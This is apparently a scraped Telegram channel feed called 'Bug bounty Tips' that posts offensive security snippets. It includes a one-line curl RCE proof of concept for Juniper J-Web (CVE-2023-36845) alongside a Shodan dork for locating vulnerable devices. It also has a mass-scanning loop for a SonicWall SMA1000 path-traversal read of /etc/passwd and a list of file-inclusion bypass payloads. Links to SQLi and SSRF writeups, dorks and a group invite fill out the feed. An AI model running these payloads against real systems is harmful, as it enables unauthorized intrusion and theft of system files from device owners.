Bug bounty Tips
Open in Telegram
π‘οΈ Cybersecurity enthusiast | π» Helping secure the digital world | π Web App Tester | π΅οΈββοΈ OSINT Specialist Admin: @laazy_hack3r
Show more5 855
Subscribers
+624 hours
+707 days
+36030 days
Posts Archive
5 855
Juniper J-Web - Remote Code Execution π₯ - CVE-2023-36845
Nearly 14,000 Juniper devices are affected, as a search on Shodan shows:
Dork : title:"Juniper" http.favicon.hash:2141724739
Poc:
curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'
5 855
POST /register HTTP/1.1
Host: host.com
email=iamhunter@hackerone.com&password=userPassword
#bugbountytips
5 855
Browser-Based Application Local File Inclusion
file:///etc/passwd
- view-source:file:///etc/passwd
- file:/etc/passwd?/
- file:///etc/?/../passwd
- file:${br}/et${u}c/pas${te}swd?/
- file:/etc/passwd?/
- file:/etc/passwd%3F/
- file:/etc%252Fpasswd/
- file:/etc%252Fpasswd%3F/
- file:///etc/%3F/../passwd
- file:${br}/et${u}c/pas${te}swd?/
- file:$(br)/et$(u)c/pas$(te)swd?/
- file:${br}/et${u}c%252Fpas${te}swd?/
- file:$(br)/et$(u)c%252Fpas$(te)swd?/
- file:${br}/et${u}c%252Fpas${te}swd%3F/
- file:$(br)/et$(u)c%252Fpas$(te)swd%3F/
- file:///etc/passwd?/../passwd
- text:/etc/passwd
#bugbountytips
5 855
Here is the Amazing Writeups Regards SQLi with deep understanding
https://medium.com/@bug4y0u/how-i-got-4-sqli-vulnerabilities-at-one-target-manually-using-the-repeater-tab-ed4eb1f84147
5 855
CVE-2023-0126
SonicWall SMA1000
File Read Bug
POC:
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done
5 855
π₯OSCP Trainingπ₯π‘βοΈπ¨π»βπ»:
Mindmap/Nmap/nmap UHD.png at main Β· Ignitetechnologies/Mindmap Β· GitHub
https://github.com/Ignitetechnologies/Mindmap/blob/main/Nmap/nmap%20UHD.png
Mindmap/Red Team Dorks at main Β· Ignitetechnologies/Mindmap Β· GitHub
https://github.com/Ignitetechnologies/Mindmap/tree/main/Red%20Team%20Dorks
Mindmap/Google Dorks at main Β· Ignitetechnologies/Mindmap Β· GitHub
https://github.com/Ignitetechnologies/Mindmap/tree/main/Google%20Dorks
5 855
π SSRF Vulnerability Series π
Dive into the world of Server-Side Request Forgery (SSRF) and uncover its secrets in this comprehensive series:
1. Understanding SSRF Vulnerabilities and Their Impact
2. Exploring the Canvas: Common Exploits for Accessing Internal Pages
3. Revealing Hidden Treasures: Accessing Internal Files via URL Scheme
4. Connecting to Services via URL Schemes
5. Mastering SSRF Exploits: Unraveling Gophers' Web of Intrigue
6. XSPA: Navigating the Labyrinth of Port Scanning in SSRF
7. Unveiling the Secrets of Cloud Provider Metadata through SSRF
8. Unlocking Forbidden Territories: Mastering Blacklist Bypass Techniques
Explore each chapter to enhance your SSRF knowledge! ππ‘
5 855
Join the groupfor workshop we will provide u a joining link there. Would appreciate more if u want to. Attend this beautiful wisdom sharing thing.
Follow this link to join my WhatsApp group: https://chat.whatsapp.com/IDNr59i9JbB3dYNW6R6GoK
Available now! Telegram Research 2025 β the year's key insights 
